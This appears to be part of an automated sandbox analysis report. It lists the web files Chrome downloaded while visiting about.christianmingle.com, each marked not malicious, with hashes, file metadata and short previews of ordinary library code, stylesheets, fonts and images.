                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[80276,59612],{459612:(W,u,t)=>{var a=W.exports=t(619015);a.tz.load(t(379210))},619015:function(W,u,t){var a,b,o;//! moment-timezone.js.//! version : 0.5.44.//! Copyright (c) JS Foundation and other contributors.//! license : MIT.//! github.com/moment/moment-timezone.(function(p,O){"use strict";W.exports?W.exports=O(t(545334)):(b=[t(545334)],a=O,o=typeof a=="function"?a.apply(u,b):a,o!==void 0&&(W.exports=o))})(this,function(p){"use strict";p.version===void 0&&p.default&&(p=p.default);var O="0.5.44",A={},d={},n={},i={},L={},T;(!p||typeof p.version!="string")&&n0("Moment Timezone requires Moment.js. See https://momentjs.com/timezone/docs/#/use-it/browser/");var Y=p.version.split("."),D=+Y[0],p0=+Y[1];(D<2||D===2&&p0<6)&&n0("Moment Timezone requires Moment.js >= 2.6.0. You are using Moment.js "+p.version+". See momentjs.com");function h(r){return r>96?r-87:r>64?r-29:r-48}function Q(r){var l=0,f=r.split("."),R=f[0],X=f[
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):65
                                                                                                                                                                                                                                                                                Entropy (8bit):4.0299097360388085
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:IskNjygbU8e2r+nqh8oO:wj3o2GoO
                                                                                                                                                                                                                                                                                MD5:2489B6BEDA4E86203D22D9C4D2E67094
                                                                                                                                                                                                                                                                                SHA1:590C361A0E91BB56D08DDEC98BF49A02E017D191
                                                                                                                                                                                                                                                                                SHA-256:E7112B70EED95D42B178135728E6153E34F07001827870748DE87CD7DEC3538E
                                                                                                                                                                                                                                                                                SHA-512:2DB08EB201F83DD7C2B7293A1E8375C0FE06B1787E21EC0D2F6EF3BC9D5355CCC06208B79FF2457C0175B30A1643AE3B624684E4E834AFDEEA727D7E61A0FB3C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://psb.taboola.com/topics_api
                                                                                                                                                                                                                                                                                Preview:<HTML><HEAD> <TITLE>200 OK</TITLE></HEAD><BODY>.OK.</BODY></HTML>
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                                                                Entropy (8bit):4.057426088150192
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YGKeMfQ2pHWiR8HopHW4OE9HsuXU9WyRHfHyY:YGKed2pHD5YEl5k9zyY
                                                                                                                                                                                                                                                                                MD5:B04CD3F8043EF04F417D4B0E4BCBBC03
                                                                                                                                                                                                                                                                                SHA1:88F259A4AE3045409B3657E7D7A791D321BA9DCE
                                                                                                                                                                                                                                                                                SHA-256:59E58524340CD7AD353BE010374B124C242FDDE10A0ED41047FE2FD4BB9E5A2E
                                                                                                                                                                                                                                                                                SHA-512:A285C493B939D2A165D80F87FC830F5D02AFCC7A8EA1C5CAF9CAA87ABD286F1C98598FFD83023044BDB23D344C60EEF6A6C4BFEDEDD42A4297A0AC09E22FA5B2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                                                                                                                Preview:{"country":"US","state":"NY","stateName":"New York","continent":"NA"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1464)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1499
                                                                                                                                                                                                                                                                                Entropy (8bit):4.983141781132298
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Q77GSHLWBBB7c0pP30RddMUq2TXWtMr39tNsSlCtMyrjXsFXrTBF0Z005O6xcHT:Q7CSHLWrxccP30RA2Tmte9/TlCtdcFbp
                                                                                                                                                                                                                                                                                MD5:8C0498E2F1F7A684A8D2A3FEB934B64B
                                                                                                                                                                                                                                                                                SHA1:76099689CCAEE466D4608DA621C403B368DCAE03
                                                                                                                                                                                                                                                                                SHA-256:ED5B5DF9CEACFE76857AC51964972B0B417A215B2F50E837FD6B64BAD7339C40
                                                                                                                                                                                                                                                                                SHA-512:5689B6B18071D6020A8A2733BB9E17C07960D9E65F4012CE93F21347FA24A24175509BCA6920FE1B03D66FBC054D718671C23071AF115B64000C01DFBEA2E8DD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
                                                                                                                                                                                                                                                                                Preview:/*! This file is auto-generated */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof module&&module.exports?module.exports=e(require("jquery")):jQuery&&!jQuery.fn.hoverIntent&&e(jQuery)}(function(f){"use strict";function u(e){return"function"==typeof e}var i,r,v={interval:100,sensitivity:6,timeout:0},s=0,a=function(e){i=e.pageX,r=e.pageY},p=function(e,t,n,o){if(Math.sqrt((n.pX-i)*(n.pX-i)+(n.pY-r)*(n.pY-r))<o.sensitivity)return t.off(n.event,a),delete n.timeoutId,n.isActive=!0,e.pageX=i,e.pageY=r,delete n.pX,delete n.pY,o.over.apply(t[0],[e]);n.pX=i,n.pY=r,n.timeoutId=setTimeout(function(){p(e,t,n,o)},o.interval)};f.fn.hoverIntent=function(e,t,n){function o(e){var u=f.extend({},e),r=f(this),v=((t=r.data("hoverIntent"))||r.data("hoverIntent",t={}),t[i]),t=(v||(t[i]=v={id:i}),v.timeoutId&&(v.timeoutId=clearTimeout(v.timeoutId)),v.event="mousemove.hoverIntent.hoverIntent"+i);"mouseenter"===e.type?v.isActive||(v.pX=u.pageX,v.pY=u.pageY,r.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10241), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):10241
                                                                                                                                                                                                                                                                                Entropy (8bit):5.165608083920421
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:EajuLigkRhS1rNp7NWzdkfszvx3imWAel/L0Fx18b2Vauta2fI/OTz+UCR7:EajuLigWhS1rT7NW2fszhibLexa2VauK
                                                                                                                                                                                                                                                                                MD5:7BE65AC27024C7B5686F9D7C49690799
                                                                                                                                                                                                                                                                                SHA1:241ADA4A86443ADC5623D1A3A8018A96D9DE6D5A
                                                                                                                                                                                                                                                                                SHA-256:52DB930F81D97113DDE679CAC624CB5435B56D4AC486E91A0B6692D2CB615A84
                                                                                                                                                                                                                                                                                SHA-512:BBE6373705C81DA5C7C3C132583338B875CA76CD5F963DFBA95195BD8E2710E819B62924130F49B04FC0EA07E35677580924575D62E8CBCE75D1644CE5F96D15
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var t={d:(e,s)=>{for(var i in s)t.o(s,i)&&!t.o(e,i)&&Object.defineProperty(e,i,{enumerable:!0,get:s[i]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function s(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,s){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,s)},t};this.tree=e();const s=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,i]of this.formData){const o=t.match(s);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,i);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const s=t.pop
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 15980, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):15980
                                                                                                                                                                                                                                                                                Entropy (8bit):7.986916928735395
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:ywBMgf4AVxqn7+b6PsXxj7ZpPrOtiMLjnuw5bTA4rE48dZTyOK/:ybzAV8niMixj7KsMHuKTA40dFyn/
                                                                                                                                                                                                                                                                                MD5:6C5AE80149AEB87C0AB1AD5CA792F93D
                                                                                                                                                                                                                                                                                SHA1:18D95BBD2040EF13DB0400BB13262BE2CE3E9199
                                                                                                                                                                                                                                                                                SHA-256:AAA877781157FD03A54D6B0F27283E5B153A6D1B44A20C2D80C695F5E07D242B
                                                                                                                                                                                                                                                                                SHA-512:944B0C5D8C06F1F02F7F10CC8D17F0F495A919AEDDD960507C3BF4960B456B463AFFBD2E774D2AED42BD0ED65FC3AD6C0DF63E789FADA09F54FBA0B2F8095F9A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/librefranklin/v18/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduh8MKkANDJ.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2......>l.......,..>..............................@..,.`?STATD........<........6.$.... ..\......Ot...g.....(.......(.a.S......2.H.l..N.hc..e....b.Ov.^..........`V. .....Fi;.L.....sW~..W@..)....l.....D.....3...@0d.U..1...3.c..]..r...-..01..3|L.-3.3...W.....Y....G.8A.GC....)..@...^.h."v^;k....K'.@.:5...2...D...KsI.hJx}.T##'..v[...~;......4..8..].w..DwQ.)...0...S...'./....._d.^E%.7.....G.$....S.*.....A.[.3...^.O....u.....$...........j.T.s.i..*.........W/+.?......_vRE..S.J.{..{u.... .Z..e...[.....B.!.l....X.o.......i..@-pQV..T.........A.....C.$?.....VG.C.\..R5......K..Z.@-.....I&^..}... A..b%?.S...Y. .....3...c.J....rZ...].@..!...7..h.,........K$..R...Iq.{:.....3.t......3 .a.........I...`.)..)..R+..U5.W#.,. .u.,..$...U..Z..W....5..{.\..H......X....X1"..|9..H............<...q..{...WV.x5.p.iR..Ab...\q..W...KE_.t]...7..(....].,..i..bWuJF........8@.;..:.ZY. ..G=.F../.......XQ....~..a..`.e.R#....Bg.[.`....M..}......jck~F5..&....O.HP..Y....f'
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):52916
                                                                                                                                                                                                                                                                                Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (59701)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):113381
                                                                                                                                                                                                                                                                                Entropy (8bit):4.921824878665509
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:MZeJKfZdlk2u5SOV+UQ37410kxJdPfrF3Ps:MZeJMTk2u5SOV+UQ37410kTd3Z3Ps
                                                                                                                                                                                                                                                                                MD5:51A8390B47AA0582CF2D9C96C5ADDEE2
                                                                                                                                                                                                                                                                                SHA1:B16A640874025D085C38119A1A02A3460F83F2DE
                                                                                                                                                                                                                                                                                SHA-256:98CECF88A23542FA047CE46EEDB650B5C5128761ED4386C0977B847094DDFA20
                                                                                                                                                                                                                                                                                SHA-512:711162AB43E59E0FF5F050CCA4278682194248A13EF2EE1F00AB276B6221E7A4DDDEB9645E8798E7F67A34F0001C8F63469F2B2C3E6D4E2519ADA30B6775E191
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-includes/css/dist/block-library/style.min.css?ver=6.5.3
                                                                                                                                                                                                                                                                                Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-bl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7687)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):7784
                                                                                                                                                                                                                                                                                Entropy (8bit):5.151673161088284
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:DaLtB8pfbHh5zlnfXa/Yl+Nza7Grui62y2+/TK2IJ2ru+xe:DtxB55i/Yl+Nza7Grui6ph/TKXJku+xe
                                                                                                                                                                                                                                                                                MD5:74EE4C679B03074B55A1DA9BBBE29CF5
                                                                                                                                                                                                                                                                                SHA1:745701D8AB39733F989313A5747C54CF3248EB5B
                                                                                                                                                                                                                                                                                SHA-256:5C2F6C5D5CD0FE0ECFA24B844F841C8A73D8BAAAFB827EC413AFA41335AA1C47
                                                                                                                                                                                                                                                                                SHA-512:9922FFB29E524D3700DA8F2B9952AED2BD396966873A95079918C10DCECC5676DA0FC0F1AB0772D678F4BFD6084EA21AA17CDBB4668E3A11A8244D68E8D983BE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! jQuery Mobile v1.4.5 | Copyright 2010, 2014 jQuery Foundation, Inc. | jquery.org/license */..(function(e,t,n){typeof define=="function"&&define.amd?define(["jquery"],function(r){return n(r,e,t),r.mobile}):n(e.jQuery,e,t)})(this,document,function(e,t,n,r){(function(e,t,n,r){function T(e){while(e&&typeof e.originalEvent!="undefined")e=e.originalEvent;return e}function N(t,n){var i=t.type,s,o,a,l,c,h,p,d,v;t=e.Event(t),t.type=n,s=t.originalEvent,o=e.event.props,i.search(/^(mouse|click)/)>-1&&(o=f);if(s)for(p=o.length,l;p;)l=o[--p],t[l]=s[l];i.search(/mouse(down|up)|click/)>-1&&!t.which&&(t.which=1);if(i.search(/^touch/)!==-1){a=T(s),i=a.touches,c=a.changedTouches,h=i&&i.length?i[0]:c&&c.length?c[0]:r;if(h)for(d=0,v=u.length;d<v;d++)l=u[d],t[l]=h[l]}return t}function C(t){var n={},r,s;while(t){r=e.data(t,i);for(s in r)r[s]&&(n[s]=n.hasVirtualBinding=!0);t=t.parentNode}return n}function k(t,n){var r;while(t){r=e.data(t,i);if(r&&(!n||r[n]))return t;t=t.parentNode}return null}function L()
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4366
                                                                                                                                                                                                                                                                                Entropy (8bit):5.042559319059115
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:0UFeeMVDvvkKl32w+dRnYfHx1nmQLTcn1rJNXnLvS+IjgnecZL:0Z3x+bnYfHo1LvSbjM
                                                                                                                                                                                                                                                                                MD5:121B0DC39B53B3621B3F6B5B3F8E676A
                                                                                                                                                                                                                                                                                SHA1:FF93FF11C238F668935A0BE6A0E34993537BC7C2
                                                                                                                                                                                                                                                                                SHA-256:AA83D7043CEAE6ABBB780E47AB4A71BAE70C09B46207AB0CA4D5211ED060B631
                                                                                                                                                                                                                                                                                SHA-512:69DA10F53D5BEE74EAE67D095497F23F5E2995A382037ABADC5E87C9EB9F2C069C9DC3DAEED57406D511C98C595A0A9A22528AD8EE431A46B578AF39364F79A4
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(function($){..window.tm_pb_smooth_scroll = function( $target, $top_section, speed, easing ) {...var $window_width = $( window ).width();....if ( $( 'body' ).hasClass( 'tm_fixed_nav' ) && $window_width > 980 ) {....$menu_offset = $( '#top-header' ).outerHeight() + $( '#main-header' ).outerHeight() - 1;...} else {....$menu_offset = -1;...}....if ( $ ('#wpadminbar').length && $window_width > 600 ) {....$menu_offset += $( '#wpadminbar' ).outerHeight();...}....//fix sidenav scroll to top...if ( $top_section ) {....$scroll_position = 0;...} else {....$scroll_position = $target.offset().top - $menu_offset;...}....// set swing (animate's scrollTop default) as default value...if( typeof easing === 'undefined' ){....easing = 'swing';...}....$( 'html, body' ).animate( { scrollTop : $scroll_position }, speed, easing );..}...window.tm_fix_video_wmode = function( video_wrapper ) {...$( video_wrapper ).each( function() {....if ( $(this).find( 'iframe' ).length ) {.....var $this_el = $(this).find( '
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1500x1000, components 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):180224
                                                                                                                                                                                                                                                                                Entropy (8bit):7.896656202868383
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:V6yDokZ2cYQVW1uVYvPQ3jeDuWkxfbsDhTEt7VWdHLbKAysTspHRruM4AcDMzMg7:EyQ+MuVYnJSW8qC1UFLWtsTqrnRcDMzX
                                                                                                                                                                                                                                                                                MD5:A3C299B4355DC99AF70BB09E6B421B65
                                                                                                                                                                                                                                                                                SHA1:762444977144493BDE5307782257F7C5E0128D7B
                                                                                                                                                                                                                                                                                SHA-256:369C838D213758069B4BCDD9E8F69A7A0C21949B184E7DC4E5D1D81C13B3ABF7
                                                                                                                                                                                                                                                                                SHA-512:A961CEDB4E2796911480E780AC58A77BFE3EA5871B3C429F97F06936EDDF496DB813A0837F69BFF91FE63CB2F09BD53AC6D1525671E3102F730F591F0D1B5CA1
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:......JFIF.....,.,....".Photoshop 3.0.8BIM..........Z...%G..Z...%G.........P..Julien L. Balmer..U..Photographer....@Closeup of Young Woman Sitting on Sofa and Using Touch Screen on..7..20170309..<..024150+0000..>..20170309.....white.....bright.....window.....copyspace.....copy space.....horizontal.....indoors.....mobile phone.....modern.....monochrome.....one.....profile.....tech.....technology.....woman.....anonymous.....unrecognizable.....hand.....touch.....type.....touch screen.....cool.....casual.....listen.....music.....sofa.....sitting.....cell.....cellphone.....lifestyle.....phone.....smartphone.....modern.....trendy.....earphone.....headphone.....style.....stylish.....hip.....hipster.....close up.....closeup..t.[.2017 Julien L. Balmer, all rights reserved.VISUALSPECTRUM photography | Bangkok & Z.rich.8BIM.%.......=...fB|...,.8BIM.:....................printOutput........PstSbool.....Inteenum....Inte....Clrm....printSixteenBitbool.....printerNameTEXT..........printProofSetup
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (565), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):565
                                                                                                                                                                                                                                                                                Entropy (8bit):5.013395369899308
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:hR2zGkAIrR/+RRa2OXnlEceA9uJ33+SGf6bGEo3G1ONOI:hR26arh+R8xXeclk+h6vo2qOI
                                                                                                                                                                                                                                                                                MD5:433CBAC690542626F503B4269A8DA12A
                                                                                                                                                                                                                                                                                SHA1:3E810BC4ABACCF42AC5E4B0B939D63C03711BBD9
                                                                                                                                                                                                                                                                                SHA-256:F83B1A3EA61AD62E47FAD82DE5495A2547E2F12E591AD8108050538C566AE1E3
                                                                                                                                                                                                                                                                                SHA-512:569B3D704F2A979D16624064ABD3B97F38EEA3C9A5F3F09D31C9B83D62C360717F6F66EE44A6B53686760421A57D7EB4ABD54904556B105B05AA81D5850F34B9
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ct.pinterest.com/ct.html
                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html lang="en"><head><title>Pinterest ct</title></head><body><div id="root"></div><script>window.addEventListener("message", (event) => {if (event.origin != "https://www.pinterest.com") {return;}try {if (event.data.key == "_epik_localstore") {window.localStorage.setItem(event.data.key, event.data.value);}} catch (error) {}}, false);window.addEventListener("load", (event) => {try {window.parent.postMessage({ key: "_epik_localstore", value: window.localStorage.getItem("_epik_localstore") }, "*")} catch (error) {}}, false);</script></body></html>
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (577)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):300905
                                                                                                                                                                                                                                                                                Entropy (8bit):5.482945781545427
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:KVIvj27tfrDxyExsO40FyYZNgYCsGsRt0lcvm4N8W3VrQqDW+/fMheYULy/:KVIvj27drDxyExs50FyYEYYlcvm4Nt3U
                                                                                                                                                                                                                                                                                MD5:B0E91380D8D1FE01441DF47457D93211
                                                                                                                                                                                                                                                                                SHA1:F2E55BA7F64CE135DE25CEB1CA6B723DAC4D938B
                                                                                                                                                                                                                                                                                SHA-256:22D7B487C7ED16B6DB70AE6AAD638E15244B54CDF550AD8F0ADD612FCF1B1C69
                                                                                                                                                                                                                                                                                SHA-512:5F86A8634DB341D866BDA45EF127B00EDF696B5E2428BFB9EECCD64938202DC1DDE6CEB1505F057928AA828D0F528B88D15F49E65DD79DBDA658154F57A4FC4F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:google.maps.__gjsload__('common', function(_){var ega,fga,gga,hga,iga,jga,kga,lga,mga,nga,oga,qga,gr,sga,tga,mr,nr,vga,rr,tr,wr,wga,xga,yga,zga,Aga,Rr,Cga,Dga,Ega,Fga,Ur,Wr,Xr,Iga,Lga,Nga,bs,ds,Pga,Rga,Sga,Tga,Xga,Is,$ga,cha,fha,Ws,hha,gha,kt,lt,kha,nt,lha,mha,nha,oha,pha,qha,rha,sha,wha,xha,Aha,vt,Bha,wt,Cha,xt,Dha,yt,Bt,Dt,Fha,Iha,Jha,Lha,Pha,Qha,Kha,Rha,Tha,Uha,bu,Wha,Yha,$ha,mu,dia,Su,mia,oia,nia,sia,uia,xia,yia,zia,Aia,Bv,Hv,Fia,Iv,Lv,Gia,Mv,Hia,Pv,Tv,Nia,Oia,Qia,Sia,Ria,Uia,Tia,Pia,Via,cw,Zia,$ia,aja,hw,bja,Ija,Mja,Oja,Qja,dka,ry,Cka,Gka,.Eka,Jka,Nka,Oka,Wka,Xka,Yka,Zka,Ry,Sy,bla,cla,dla,ela,Ty,Hr,Gr,Mga,lr,uga,as,$r,Zr,Hga,Jga,Vy,Oga,Qga,Lx,Mx,gla,Nja,Kx,Nx,Uga,Vga,Rja,Wga,aha,Zy,hla,az,bz,ila,jla,lla,dz,mla,nla,fz,gz,ola,pla,iz,qla,jz,rla,sla,mz,tla,oz,ula,vla,qz,wla,xla,sz,tz,uz,vz,yla,zla,Ala,tha,vha,Fla,Gla,Hla,Ila,Jla,zz,Bx,Mla,Nla,Ola,Pla,Nha,Jt,Qla,jka,Bka,uka,Zt,aia,gu,Rla;_.dr=function(a,b){return _.aa[a]=b};ega=function(a,b){return _.vd(b)};fga=function(a){return a};gg
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (64267), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):689520
                                                                                                                                                                                                                                                                                Entropy (8bit):4.981157076301088
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:BSolzMRQfF8sSi4fQkWOrgbP4hIQGIQWIQ5Zyir0Qa3MfDytZ:BSeMRQfIfQkWOrgCIQGIQWIQ5Zyir0Q8
                                                                                                                                                                                                                                                                                MD5:E1236157B527B3F36CCF75AED14D3E36
                                                                                                                                                                                                                                                                                SHA1:EF117A09C81056099219CBA699371E6057317DEB
                                                                                                                                                                                                                                                                                SHA-256:9980111FEE64E6A5179FD7978DD8E8D9B72CB7A6784EAC304228F66E6F850DEE
                                                                                                                                                                                                                                                                                SHA-512:119CB24354F20D8CB5DFD84F7A85A850E010142EAAD15359B1B3FCFDCA35A2B1719A1A7A71C717F5266258339B147552900D48F2D1816F5901794C350BF54797
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/style.css?ver=6.5.3
